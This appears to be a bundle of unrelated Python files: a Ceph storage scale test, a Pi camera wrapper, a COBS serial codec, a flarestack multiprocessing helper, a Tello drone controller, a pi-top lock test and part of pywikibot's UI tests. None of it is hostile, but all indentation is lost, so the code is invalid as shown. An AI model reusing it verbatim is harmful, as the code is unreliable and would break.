def finalizer():
self.cleanup()
request.addfinalizer(finalizer)
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a project for the test
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
@pytest.fixture()
def storageclass(self, storageclass_factory):
"""
Create Storage class for rbd and cephfs
"""
self.rbd_sc_obj = storageclass_factory(interface=constants.CEPHBLOCKPOOL)
self.cephfs_sc_obj = storageclass_factory(interface=constants.CEPHFILESYSTEM)
def test_pv_scale_out_create_pvcs_and_respin_ceph_pods(
self,
namespace,
storageclass,
setup_fixture,
resource_to_delete,
memory_leak_function,
):
pvc_count_each_itr = 10
scale_pod_count = 120
size = "10Gi"
test_run_time = 180
self.all_pvc_obj, self.all_pod_obj = ([] for i in range(2))
# Identify median memory value for each worker node
median_dict = helpers.get_memory_leak_median_value()
log.info(f"Median dict values for memory leak {median_dict}")
# First Iteration call to create PVC and POD
self.create_pvc_pod(
self.rbd_sc_obj, self.cephfs_sc_obj, pvc_count_each_itr, size
)
# Re-spin the ceph pods one by one in parallel with PVC and POD creation
while True:
if scale_pod_count <= len(self.all_pod_obj):
log.info(f"Create {scale_pod_count} pvc and pods")
break
else:
thread1 = threading.Thread(
target=self.respin_ceph_pod, args=(resource_to_delete,)
)
thread2 = threading.Thread(
target=self.create_pvc_pod,
args=(
self.rbd_sc_obj,
self.cephfs_sc_obj,
pvc_count_each_itr,
size,
),
)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Added sleep for test case run time and for capturing memory leak after scale
time.sleep(test_run_time)
utils.ceph_health_check()
helpers.memory_leak_analysis(median_dict)
|
picam.py | import logging
from io import BytesIO, StringIO
import time
from PIL import Image
import threading
import queue
log = logging.getLogger(__name__)
picamera_override = None
class Picamera():
def __init__(self, image_format='jpeg', queue_max_size=10):
self.error = None
self.format = image_format
self.queue = queue.Queue(queue_max_size)
self._stop = threading.Event()
self.thread1 = threading.Thread(target=self.run, args=())
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, tb):
self.stop()
return self
def start(self):
self._stop.clear()
self.thread1.start()
def has_failure(self):
return self.error is not None
def _get_camera(self):
if picamera_override is None:
try:
import picamera
return picamera.PiCamera()
except Exception as err:
log.warning("Error loading picamera module: %s" % err)
self.error = err
return None
else:
return picamera_override.PiCamera()
def run(self):
cam = self._get_camera()
if cam is None:
# picam not available
return
with cam as camera:
if self.has_failure():
return None
log.debug("Started Picamera")
time.sleep(2)
stream = BytesIO()
for _ in camera.capture_continuous(stream, format=self.format):
if self._stop.is_set():
log.debug("Stop requested")
break
if not self.queue.full():
try:
self.queue.put(
Image.open(BytesIO(stream.getvalue())),
block=False
)
log.debug("Queued capture")
except queue.Full:
pass
except Exception as ex:
log.error("Failed to add to queue: %s" % ex)
stream.seek(0)
stream.truncate()
try:
stream.close()
except Exception as ex:
log.error("Failed to close stream: %s" % ex)
def acquire(self):
try:
# log.debug("queue len=%s" % self.queue.qsize())
return self.queue.get(block=False)
except queue.Empty:
return None
def stop(self):
self._stop.set()
self.queue = queue.Queue()
self.thread1.join()
|
cobs_serial.py | import time
import serial
import struct
import threading
# This is different from cobs.py as no padding is performed here
# Behavior is undefined if first byte of buf is 0
def cobs_encode(buf):
if len(buf) == 0:
return b"\x00"
if buf[0] != 0:
buf = b"\x00" + buf
return cobs_encode(buf)
# buf[0] must be 0 here
assert buf[0] == 0
a, sep, b = buf[1:].partition(b"\x00")
return bytes([len(a)+1])+a+cobs_encode(sep + b)
def cobs_decode(buf):
if buf == b"":
return b""
if buf == b"\x00":
return b""
out = bytearray(buf[0])
out[1:] = buf[1:len(out)]
return out + cobs_decode(buf[len(out):])
class COBSSerial:
def __init__(self, port):
self.port = serial.Serial(None, 115200, timeout=0)
self.port.port = port
self.subscribers = {}
self.port_lock = threading.RLock()
self.read_thread = None
self.stop = False
self.read_buf = bytearray()
def begin(self):
self.port.open()
time.sleep(0.1)
with self.port_lock:
self.port.write(range(64)) # Get out of bootloader
if self.read_thread is None:
self.read_thread = threading.Thread(
target=self.read_thread_fun)
self.read_thread.start()
def end(self):
self.stop = True
self.read_thread.join()
self.read_thread = None
self.port.close()
def get_packet(self):
with self.port_lock:
buf = self.port.read(64)
self.read_buf += buf
if 0 in self.read_buf:
sep = self.read_buf.find(0)
buf = self.read_buf[:sep]
self.read_buf = self.read_buf[sep+1:]
buf = cobs_decode(buf)
return buf[1:]
else:
return None
def read_thread_fun(self):
while not self.stop:
buf = self.get_packet()
if buf is None:
continue
tag = buf[:3].decode("cp437")
if tag in self.subscribers:
if "__iter__" not in dir(self.subscribers[tag]):
# Just call the function itself
self.subscribers[tag](buf)
else:
for f in self.subscribers[tag]:
f(buf)
def write(self, payload_bytes):
buf = cobs_encode(payload_bytes)
with self.port_lock:
self.port.write(buf)
#self.port.flush()
|
multiprocess_wrapper.py | import pickle
import logging
import time
from logging.handlers import QueueHandler, QueueListener
import argparse
from flarestack.core.minimisation import MinimisationHandler, read_mh_dict
from multiprocessing import JoinableQueue, Process, Queue, Value
import random
from multiprocessing import set_start_method
logger = logging.getLogger(__name__)
try:
set_start_method("fork")
except RuntimeError:
pass
def generate_dynamic_mh_class(mh_dict):
# mh_dict = read_mh_dict(mh_dict)
try:
mh_name = mh_dict["mh_name"]
except KeyError:
raise KeyError("No MinimisationHandler specified.")
# Set up dynamic inheritance
try:
ParentMinimisationHandler = MinimisationHandler.subclasses[mh_name]
except KeyError:
raise KeyError("Parent class {} not found.".format(mh_name))
class MultiProcessingMinimisationHandler(ParentMinimisationHandler):
def add_injector(self, season, sources):
pass
return MultiProcessingMinimisationHandler(mh_dict)
class MultiProcessor:
queue = None
results = dict()
def __init__(self, n_cpu, **kwargs):
self.queue = JoinableQueue()
self.log_queue = Queue()
self.n_tasks = Value("i", 0)
kwargs["n_tasks"] = self.n_tasks
self.processes = [
Process(target=self.run_trial, kwargs=kwargs) for _ in range(int(n_cpu))
]
self.mh = MinimisationHandler.create(kwargs["mh_dict"])
for season in self.mh.seasons.keys():
inj = self.mh.get_injector(season)
inj.calculate_n_exp()
self.mh_dict = kwargs["mh_dict"]
self.scales = []
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter("%(levelname)s: %(asctime)s - %(process)s - %(message)s")
)
# ql gets records from the queue and sends them to the handler
ql = QueueListener(self.log_queue, handler)
ql.start()
for p in self.processes:
p.start()
def add_to_queue(self, item):
self.queue.put(item)
def dump_all_injection_values(self):
for scale in self.scales:
self.mh.dump_injection_values(scale)
def run_trial(self, **kwargs):
qh = QueueHandler(self.log_queue)
logger.addHandler(qh)
mh_dict = kwargs["mh_dict"]
mpmh = generate_dynamic_mh_class(mh_dict)
n_tasks = kwargs["n_tasks"]
while True:
item = self.queue.get()
if item is None:
break
(scale, seed) = item
full_dataset = self.mh.prepare_dataset(scale, seed)
mpmh.run_single(full_dataset, scale, seed)
with n_tasks.get_lock():
n_tasks.value -= 1
self.queue.task_done()
def fill_queue(self):
scale_range, n_trials = self.mh.trial_params(self.mh_dict)
self.scales = scale_range
for scale in scale_range:
for _ in range(n_trials):
self.add_to_queue((scale, int(random.random() * 10**8)))
n_tasks = len(scale_range) * n_trials
with self.n_tasks.get_lock():
self.n_tasks.value += n_tasks
logger.info("Added {0} trials to queue. Now processing.".format(n_tasks))
while self.n_tasks.value > 0.0:
logger.info("{0} tasks remaining.".format(self.n_tasks.value))
time.sleep(30)
logger.info("Finished processing {0} tasks.".format(n_tasks))
def terminate(self):
"""wait until queue is empty and terminate processes"""
self.queue.join()
for p in self.processes:
p.terminate()
self.dump_all_injection_values()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
def run_multiprocess(n_cpu, mh_dict):
with MultiProcessor(n_cpu=n_cpu, mh_dict=mh_dict) as r:
r.fill_queue()
r.terminate()
del r
if __name__ == "__main__":
import os
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", help="Path for analysis pkl_file")
parser.add_argument("-n", "--n_cpu", default=min(max(1, os.cpu_count() - 1), 32))
cfg = parser.parse_args()
logger.info(f"N CPU available {os.cpu_count()}. Using {cfg.n_cpu}")
with open(cfg.file, "rb") as f:
mh_dict = pickle.load(f)
run_multiprocess(n_cpu=cfg.n_cpu, mh_dict=mh_dict)
|
tello.py | import os
import socket
import queue
import threading
import time
import datetime
import cv2
import numpy as np
import paddlehub as hub
from PIL import Image
from .stats import Stats
from .frame2html import VideoCamera, run_app
q = queue.Queue()
# q.queue.clear()
class Tello:
def __init__(self, te_ip: str = '192.168.10.1', debug: bool = True):
# 在8889上打开本地UDP端口以进行无人机通信
self.local_ip = ''
self.local_port = 8889
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.local_ip, self.local_port))
# 设置无人机IP和端口信息
self.te_ip = te_ip
self.te_port = 8889
self.te_address = (self.te_ip, self.te_port)
self.log = []
self.picture_path = ''
self.file_path = ''
self.frame = None
# 加载动物识别模型
self.module = hub.Module(name="resnet50_vd_animals")
# 初始化响应线程
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = True
self.receive_thread.start()
# 本项目运行时选项
self.stream_state = False
self.camera_state = False
self.color_state = False
self.video_state = False
self.save_state = False
self.picture_state = False
self.animal_state = False
self.flip_frame = False
self.now_color = 0
self.MAX_TIME_OUT = 15.0
self.debug = debug
# 将无人机设置为命令模式
self.command()
def send_command(self, command: str, query: bool = False):
# 为出站命令创建新的日志条目
self.log.append(Stats(command, len(self.log)))
# 向无人机发送命令
self.socket.sendto(command.encode('utf-8'), self.te_address)
# 显示确认消息
if self.debug is True:
print('Send Command: {}'.format(command))
# 检查命令是否超时(基于MAX_TIME_OUT中的值)
start = time.time()
while not self.log[-1].got_response(): # 在日志中未收到任何响应的情况下运行
now = time.time()
difference = now - start
if difference > self.MAX_TIME_OUT:
print('Connect Time Out!')
break
# 打印出无人机响应
if self.debug is True and query is False:
print('Response: {}'.format(self.log[-1].get_response()))
def _receive_thread(self):
while True:
# 检查无人机响应,引发套接字错误
try:
self.response, ip = self.socket.recvfrom(1024)
self.log[-1].add_response(self.response)
except socket.error as exc:
print('Error: {}'.format(exc))
def _cap_video_thread(self):
# 创建流捕获对象
cap = cv2.VideoCapture('udp://' + self.te_ip + ':11111')
# cap.set(cv2.CAP_PROP_BUFFERSIZE, 2)
while self.stream_state:
ret, frame = cap.read()
while ret:
ret, frame = cap.read()
if self.flip_frame:
frame = cv2.flip(frame, 0)
cv2.imshow("DJI Tello", frame)
q.put(frame)
k = cv2.waitKey(1) & 0xFF
# 如果按Esc键,视频流关闭
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
def _service_video_thread(self):
while True:
self.frame = q.get()
# k = cv2.waitKey(1) & 0xFF
# 如果按F1键,截图到当前位置
# if k == 0 or self.camera_state:
if self.camera_state:
self.file_path = self.picture_path + '\\' + datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + '.png'
print('图片路径为:', self.file_path)
try:
cv2.imwrite(self.file_path, self.frame)
except Exception as e:
print('保存图片失败')
self.camera_state = False
# 识别动物
if self.animal_state:
results = self.module.classification(images=[self.frame])
# print(results)
key_value_list = list(results[0].items())
key_first, value_first = key_value_list[0][0], key_value_list[0][1]
if '非动物' != key_first:
# print('检测结果是:', key_first, ',相似度为:', value_first)
cv2.imshow(key_first, self.frame)
self.animal_state = False
# 显示照片
if self.picture_state:
file = self.file_path
f = Image.open(file).show()
self.picture_state = False
# 识别当前颜色
if self.color_state:
self.detect_color(self.frame)
self.color_state = False
# 将视频流发送至http
if self.video_state:
self.video_http(self.frame)
self.video_state = False
# 保存视频流至本地
if self.save_state:
self.video_save(self.frame)
self.save_state = False
def wait(self, delay: float):
# 显示等待消息
if self.debug is True:
print('Wait {} Seconds...'.format(delay))
# 日志条目增加了延迟
self.log.append(Stats('wait', len(self.log)))
# 延迟激活
time.sleep(delay)
@staticmethod
def video_http(frame):
vc = VideoCamera(frame)
run_app()
@staticmethod
def video_save(frame):
force = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output.avi', force, 20.0, (640, 480))
frame = cv2.flip(frame, 0)
# write the flipped frame
out.write(frame)
def get_log(self):
return self.log
def take_picture(self, path=os.getcwd()):
"""拍照"""
self.camera_state = True
self.picture_path = path
def show_picture(self):
"""显示照片"""
self.picture_state = True
def flip_video(self):
"""翻转视频,在加装下视镜片的情况下开启"""
self.flip_frame = True
def identify_animal(self):
"""识别动物"""
self.animal_state = True
def identify_color(self):
"""识别当前颜色(红色或绿色)"""
self.color_state = True
time.sleep(0.5)
return self.now_color
# 以下命令强烈建议配合官方SDK食用
# https://www.ryzerobotics.com/cn/tello/downloads
# 控制命令
def command(self):
"""进入SDK命令模式"""
self.send_command('command')
def takeoff(self):
"""自动起飞,1米左右"""
self.send_command('takeoff')
def land(self):
"""自动降落"""
self.send_command('land')
def streamon(self):
"""打开视频流"""
self.send_command('streamon')
self.stream_state = True
self.cap_video_thread = threading.Thread(target=self._cap_video_thread)
self.cap_video_thread.daemon = True
self.cap_video_thread.start()
def streamoff(self):
"""关闭视频流"""
self.stream_state = False
self.send_command('streamoff')
def stream_service_on(self):
"""是否开启视频流附加功能,开启视频流会卡顿"""
self.service_video_thread = threading.Thread(target=self._service_video_thread)
self.service_video_thread.daemon = True
self.service_video_thread.start()
def detect_color(self, frame):
"""颜色识别"""
# frame = cv2.imread("test.jpg")
hue_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
low_red_range1 = np.array([110, 43, 0])
high_red_range1 = np.array([180, 255, 255])
threshold_red1 = cv2.inRange(hue_image, low_red_range1, high_red_range1)
res_red1 = cv2.bitwise_and(frame, frame, mask=threshold_red1)
low_red_range2 = np.array([0, 43, 0])
high_red_range2 = np.array([10, 255, 255])
threshold_red2 = cv2.inRange(hue_image, low_red_range2, high_red_range2)
res_red2 = cv2.bitwise_and(frame, frame, mask=threshold_red2)
threshold_red = threshold_red1 + threshold_red2
res_red = res_red1 + res_red2
low_green_range = np.array([35, 43, 46])
high_green_range = np.array([77, 255, 255])
threshold_green = cv2.inRange(hue_image, low_green_range, high_green_range)
res_green = cv2.bitwise_and(frame, frame, mask=threshold_green)
res = res_red + res_green
if cv2.countNonZero(threshold_green) > 0.5 * np.size(threshold_green):
self.now_color = 'green'
elif ((cv2.countNonZero(threshold_red) > 0.5 * np.size(threshold_red)) & (
cv2.countNonZero(threshold_red) < 0.7 * np.size(threshold_red))):
self.now_color = 'red'
else:
self.now_color = 'none'
# color = cv2.cvtColor(binary, cv2.COLOR_GRAY2BGR)
return self.now_color, res
def emergency(self):
"""停止电机转动"""
self.send_command('emergency')
def up(self, x: int):
"""向上飞x(20-500)厘米"""
self.send_command('up {}'.format(x))
def down(self, x: int):
"""向下飞x(20-500)厘米"""
self.send_command('down {}'.format(x))
def left(self, x: int):
"""向左飞x(20-500)厘米"""
self.send_command('left {}'.format(x))
def right(self, x: int):
"""向右飞x(20-500)厘米"""
self.send_command('right {}'.format(x))
def forward(self, x: int):
"""向前飞x(20-500)厘米"""
self.send_command('forward {}'.format(x))
def back(self, x: int):
"""向后飞x(20-500)厘米"""
self.send_command('back {}'.format(x))
def cw(self, angle: int):
"""顺时针旋转angle°(1-360)"""
self.send_command('cw {}'.format(angle))
def ccw(self, angle: int):
"""逆时针旋转angle°(1-360)"""
self.send_command('ccw {}'.format(angle))
def flip(self, direction: str):
"""朝direction方向翻滚,左侧(left)缩写为l,同理right=r,forward=f,back=b"""
self.send_command('flip {}'.format(direction))
def go(self, x: int, y: int, z: int, speed: int):
"""以设置速度speed(cm / s)飞往坐标(x, y, z)
x: -500 - 500
y: -500 - 500
z: -500 - 500
speed: 10 - 100(cm / s)
x、y、z不能同时在 -20 ~ 20 之间"""
self.send_command('go {} {} {} {}'.format(x, y, z, speed))
def stop(self):
""""停止运动并悬停,任何时候都可以"""
self.send_command('stop')
def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""以设置速度speed( cm/s )飞弧线,经过(x1,y1,z1)到(x2,y2,z2)
如果弧线半径不在 0.5-10 米范围内,则返回相应提醒
x1, x2: -500 - 500
y1, y2: -500 - 500
z1, z2: -500 - 500
speed: 10-60
x、y、z 不能同时在 -20 ~ 20 之间"""
self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
def go_mid(self, x: int, y: int, z: int, speed: int, mid: str):
"""以设置速度speed(m/s)飞往设置 id 的挑战卡坐标系的(x,y,z)坐标点
mid:
m1/m2/~/m8:对应挑战卡上的挑战卡ID
m-1: 无人机内部算法最快识别到的挑战卡,随机选择一个探测到的挑战卡
m-2: 距离无人机中心距离最近的挑战卡
x: -500 - 500
y: -500 - 500
z: 0 - 500
speed: 10-100 (cm/s)
x、y、z 不能同时在 -20 ~ 20 之间"""
self.send_command('go {} {} {} {} {}'.format(x, y, z, speed, mid))
def curve_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: str):
"""以设置速度speed( cm/s )飞弧线,经过设置 mid 的挑战卡坐标系中的(x1,y1,z1)点到(x2,y2,z2)点
如果弧线半径不在 0.5-10 米范围内,则返回相应提醒
x1, x2: -500 - 500
y1, y2: -500 - 500
z1, z2: 0 - 500
speed: 10-60
x、y、z 不能同时在 -20 ~ 20 之间"""
self.send_command('curve {} {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed, mid))
def jump_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: str, mid2: str):
"""飞往 mid1 坐标系的(x,y,z)点后悬停,识别 mid2 的挑战卡
并在 mid2 坐标系下 (0,0,z) 的位置并旋转向到设置的 偏航yaw 值,( z>0 )"""
self.send_command('jump {} {} {} {} {} {} {}'.format(x, y, z, speed, yaw, mid1, mid2))
# 设置命令
def set_speed(self, speed: int):
"""将当前速度设为 speed cm/s,speed = 10-100"""
self.send_command('speed {}'.format(speed))
def rc_control(self, a: int, b: int, c: int, d: int):
"""设置遥控器的 4 个通道杆量
a: 横滚 (-100~100)
b: 俯仰 (-100~100)
c: 油门 (-100~100)
d: 偏航 (-100~100)
"""
self.send_command('rc {} {} {} {}'.format(a, b, c, d))
def set_wifi(self, ssid: str, passwrd: str):
"""更改 无人机 Wi-Fi 密码
ssid: 更改后的 Wi-Fi 账号
passwrd: 更改后的 Wi-Fi 密码
"""
self.send_command('wifi {} {}'.format(ssid, passwrd))
def mon(self):
""""打开挑战卡探测,默认同时打开前视和下视探测"""
self.send_command('mon')
def moff(self):
""""关闭挑战卡探测"""
self.send_command('moff')
def mdirection(self, mdir: int):
"""mdir=0/1/2
0 打开下视探测
1 打开前视探测
2 同时打开前视和下视探测
* 使用前必须使用 mon 命令打开探测功能
* 单独打开前视或者下视探测时,探测频率为20Hz,同时打开前视和下视时,将交替探测,单个反向的探测频率为 10Hz"""
self.send_command('mdirection {}'.format(mdir))
def ap2sta(self, ssid: str, passwrd: str):
"""将Tello转为 station 模式,并连入到 AP
ssid: 要连接的 Wi-Fi 账号
passwrd: 要连接的 Wi-Fi 密码"""
self.send_command('ap {} {}'.format(ssid, passwrd))
# 读取命令
def get_speed(self):
"""获取当前设置速度speed(cm/s),speed(10-100)"""
self.send_command('speed?', True)
return self.log[-1].get_response()
def get_battery(self):
"""获取当前电池剩余电量的百分比值 x,x = (10-100)"""
self.send_command('battery?', True)
return self.log[-1].get_response()
def get_time(self):
"""获取电机运转时间(s)"""
self.send_command('time?', True)
return self.log[-1].get_response()
def get_wifi(self):
"""获得 Wi-Fi 信噪比"""
self.send_command('wifi?', True)
return self.log[-1].get_response()
def get_sdk(self):
"""获得 无人机 SDK 版本号 xx(>=20)"""
self.send_command('sdk?', True)
return self.log[-1].get_response()
def get_sn(self):
"""获得 无人机 SN 码 生产序列号"""
self.send_command('sn?', True)
return self.log[-1].get_response()
def get_height(self):
"""获取高度,新版本中已停用"""
self.send_command('height?', True)
return self.log[-1].get_response()
def get_temp(self):
"""获取温度,新版本中已停用"""
self.send_command('temp?', True)
return self.log[-1].get_response()
def get_attitude(self):
"""获取飞行姿态,新版本中已停用"""
self.send_command('attitude?', True)
return self.log[-1].get_response()
def get_baro(self):
"""获取压力,新版本中已停用"""
self.send_command('baro?', True)
return self.log[-1].get_response()
def get_acceleration(self):
"""获取加速度,新版本中已停用"""
self.send_command('acceleration?', True)
return self.log[-1].get_response()
def get_tof(self):
"""获取飞行时间,新版本中已停用"""
self.send_command('tof?', True)
return self.log[-1].get_response()
|
test_lock.py | from sys import modules
from threading import Thread
from unittest import TestCase, skip
from unittest.mock import Mock, mock_open, patch
mock_os = modules["os"] = Mock()
mock_logger = modules["pitop.common.logger"] = Mock()
# import after applying mocks
from pitop.common.lock import PTLock # noqa: E402
@skip
class PTLockTestCase(TestCase):
__dummy_lock_id = "dummy"
lock_file_path = "/tmp/.com.pi-top.sdk.dummy.lock"
def tearDown(self):
mock_logger.reset_mock()
mock_os.reset_mock()
@patch("builtins.open", new_callable=mock_open())
def test_instance_opens_file(self, m):
_ = PTLock(self.__dummy_lock_id)
m.assert_called_with(self.lock_file_path, "w")
@patch("pitop.common.lock.exists", return_value=True)
def test_chmod_not_called_if_file_exist(self, exists_mock):
_ = PTLock(self.__dummy_lock_id)
exists_mock.assert_called_once_with(self.lock_file_path)
mock_os.chmod.assert_not_called()
@patch("pitop.common.lock.exists", return_value=False)
def test_chmod_is_called_if_file_doesnt_exist(self, exists_mock):
_ = PTLock(self.__dummy_lock_id)
exists_mock.assert_called_once_with(self.lock_file_path)
mock_os.chmod.assert_called_once_with(self.lock_file_path, 146)
def test_acquire_success(self):
lock = PTLock(self.__dummy_lock_id)
self.assertTrue(lock.acquire())
def test_acquire_an_already_acquired_lock_by_same_object_fails(self):
lock = PTLock(self.__dummy_lock_id)
self.assertTrue(lock.acquire())
self.assertFalse(lock.acquire())
def test_release_a_locked_lock_by_same_object_returns_true(self):
lock = PTLock(self.__dummy_lock_id)
self.assertTrue(lock.acquire())
self.assertTrue(lock.release())
def test_release_a_locked_lock_by_other_object_fails(self):
lock1 = PTLock(self.__dummy_lock_id)
self.assertTrue(lock1.acquire())
lock2 = PTLock(self.__dummy_lock_id)
self.assertFalse(lock2.release())
def test_release_an_unlocked_lock_returns_false(self):
lock = PTLock(self.__dummy_lock_id)
self.assertFalse(lock.release())
def test_acquire_locks_all_instances(self):
lock1 = PTLock(self.__dummy_lock_id)
lock2 = PTLock(self.__dummy_lock_id)
lock1.acquire()
for lock in (lock1, lock2):
self.assertTrue(lock.is_locked())
lock1.release()
def test_acquire_locks_thread_until_unlocked(self):
def acquire_lock(_lock: PTLock):
_lock.acquire()
lock = PTLock(self.__dummy_lock_id)
lock.acquire()
lock2 = PTLock(self.__dummy_lock_id)
thread = Thread(target=acquire_lock, args=[lock2])
thread.start()
self.assertTrue(thread.is_alive())
lock.release()
thread.join()
self.assertFalse(thread.is_alive())
def test_is_locked_method(self):
lock1 = PTLock(self.__dummy_lock_id)
lock2 = PTLock(self.__dummy_lock_id)
lock1.acquire()
for lock in (lock1, lock2):
self.assertTrue(lock.is_locked())
lock1.release()
for lock in (lock1, lock2):
self.assertFalse(lock.is_locked())
|
ui_tests.py | """Tests for the user interface."""
#
# (C) Pywikibot team, 2008-2021
#
# Distributed under the terms of the MIT license.
#
# NOTE FOR RUNNING WINDOWS UI TESTS
#
# Windows UI tests have to be run using the tests\ui_tests.bat helper script.
# This will set PYTHONPATH and PYWIKIBOT_DIR, and then run the tests. Do not
# touch mouse or keyboard while the tests are running, as this might disturb
# the interaction tests.
#
# The Windows tests were developed on a Dutch Windows 7 OS. You might need to
# adapt the helper functions in TestWindowsTerminalUnicode for other versions.
#
# For the Windows-based tests, you need the following packages installed:
# - pywin32, for clipboard access, which can be installed using:
# pip install -U pywin32
#
# - pywinauto, to send keys to the terminal, which can be installed using:
# pip install -U pywinauto
#
#
import inspect
import io
import logging
import os
import subprocess
import sys
import time
from contextlib import suppress
import pywikibot
from pywikibot.bot import (
ui, DEBUG, VERBOSE, INFO, STDOUT, INPUT, WARNING, ERROR, CRITICAL
)
from pywikibot.userinterfaces import (
terminal_interface_win32, terminal_interface_base, terminal_interface_unix,
)
from tests.aspects import TestCase, TestCaseBase
from tests.utils import unittest, FakeModule
if os.name == 'nt':
from multiprocessing.managers import BaseManager
import threading
try:
import win32api
except ImportError:
win32api = None
try:
import pywinauto
except ImportError:
pywinauto = None
try:
import win32clipboard
except ImportError:
win32clipboard = None
class Stream:
"""Handler for a StringIO or BytesIO instance able to patch itself."""
def __init__(self, name: str, patched_streams: dict):
"""
Create a new stream with a StringIO or BytesIO instance.
@param name: The part after 'std' (e.g. 'err').
@param patched_streams: A mapping which maps the original stream to
the patched stream.
"""
self._stream = io.StringIO()
self._name = 'std{0}'.format(name)
self._original = getattr(sys, self._name)
patched_streams[self._original] = self._stream
def __repr__(self):
return '<patched {} {!r} wrapping {!r}>'.format(
self._name, self._stream, self._original)
def reset(self):
"""Reset own stream."""
self._stream.truncate(0)
self._stream.seek(0)
if os.name == 'nt':
class pywikibotWrapper:
"""pywikibot wrapper class."""
def init(self):
pywikibot.version._get_program_dir()
def output(self, *args, **kwargs):
return pywikibot.output(*args, **kwargs)
def request_input(self, *args, **kwargs):
self.input = None
def threadedinput():
self.input = pywikibot.input(*args, **kwargs)
self.inputthread = threading.Thread(target=threadedinput)
self.inputthread.start()
def get_input(self):
self.inputthread.join()
return self.input
def set_config(self, key, value):
setattr(pywikibot.config, key, value)
def set_ui(self, key, value):
setattr(pywikibot.ui, key, value)
def cls(self):
subprocess.run('cls', shell=True)
class pywikibotManager(BaseManager):
"""pywikibot manager class."""
pass
pywikibotManager.register('pywikibot', pywikibotWrapper)
_manager = pywikibotManager(
address=('127.0.0.1', 47228),
authkey=b'4DJSchgwy5L5JxueZEWbxyeG')
if len(sys.argv) > 1 and sys.argv[1] == '--run-as-slave-interpreter':
s = _manager.get_server()
s.serve_forever()
def patched_print(text, target_stream):
try:
stream = patched_streams[target_stream]
except KeyError:
assert isinstance(target_stream,
pywikibot.userinterfaces.win32_unicode.UnicodeOutput)
assert target_stream._stream
stream = patched_streams[target_stream._stream]
org_print(text, stream)
def patched_input():
return strin._stream.readline().strip()
patched_streams = {}
strout = Stream('out', patched_streams)
strerr = Stream('err', patched_streams)
strin = Stream('in', {})
newstdout = strout._stream
newstderr = strerr._stream
newstdin = strin._stream
org_print = ui._print
org_input = ui._raw_input
def patch():
"""Patch standard terminal files."""
strout.reset()
strerr.reset()
strin.reset()
ui._print = patched_print
ui._raw_input = patched_input
def unpatch():
"""Un-patch standard terminal files."""
ui._print = org_print
ui._raw_input = org_input
logger = logging.getLogger('pywiki')
loggingcontext = {'caller_name': 'ui_tests',
'caller_file': 'ui_tests',
'caller_line': 0,
'newline': '\n'}
class UITestCase(TestCaseBase):
"""UI tests."""
net = False
def setUp(self):
super().setUp()
patch()
pywikibot.config.colorized_output = True
pywikibot.config.transliterate = False
pywikibot.ui.transliteration_target = None
pywikibot.ui.encoding = 'utf-8'
def tearDown(self):
super().tearDown()
unpatch()
class TestTerminalOutput(UITestCase):
"""Terminal output tests."""
tests = [
('debug', DEBUG, '', ''),
('verbose', VERBOSE, '', ''),
('info', INFO, '', 'info\n'),
('stdout', STDOUT, 'stdout\n', ''),
('input', INPUT, '', 'input\n'),
('WARNING', WARNING, '', 'WARNING: WARNING\n'),
('ERROR', ERROR, '', 'ERROR: ERROR\n'),
('CRITICAL', CRITICAL, '', 'CRITICAL: CRITICAL\n'),
]
def test_outputlevels_logging(self):
"""Test logger with output levels."""
for text, level, out, err in self.tests:
with self.subTest(test=text):
logger.log(level, text, extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), out)
self.assertEqual(newstderr.getvalue(), err)
patch() # reset terminal files
def test_output(self):
pywikibot.output('output')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'output\n')
def test_stdout(self):
pywikibot.stdout('output')
self.assertEqual(newstdout.getvalue(), 'output\n')
self.assertEqual(newstderr.getvalue(), '')
def test_warning(self):
pywikibot.warning('warning')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'WARNING: warning\n')
def test_error(self):
pywikibot.error('error')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'ERROR: error\n')
def test_log(self):
pywikibot.log('log')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), '')
def test_critical(self):
pywikibot.critical('critical')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'CRITICAL: critical\n')
def test_debug(self):
pywikibot.debug('debug', 'test')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), '')
def test_exception(self):
class TestException(Exception):
"""Test exception."""
try:
raise TestException('Testing Exception')
except TestException:
pywikibot.exception('exception')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(),
'ERROR: TestException: Testing Exception\n')
def test_exception_tb(self):
class TestException(Exception):
"""Test exception."""
try:
raise TestException('Testing Exception')
except TestException:
pywikibot.exception('exception', tb=True)
self.assertEqual(newstdout.getvalue(), '')
stderrlines = newstderr.getvalue().split('\n')
self.assertEqual(stderrlines[0],
'ERROR: TestException: Testing Exception')
self.assertEqual(stderrlines[1], 'Traceback (most recent call last):')
self.assertEqual(stderrlines[3],
" raise TestException('Testing Exception')")
self.assertTrue(stderrlines[4].endswith(': Testing Exception'))
self.assertNotEqual(stderrlines[-1], '\n')
class TestTerminalInput(UITestCase):
"""Terminal input tests."""
input_choice_output = 'question ([A]nswer 1, a[n]swer 2, an[s]wer 3): '
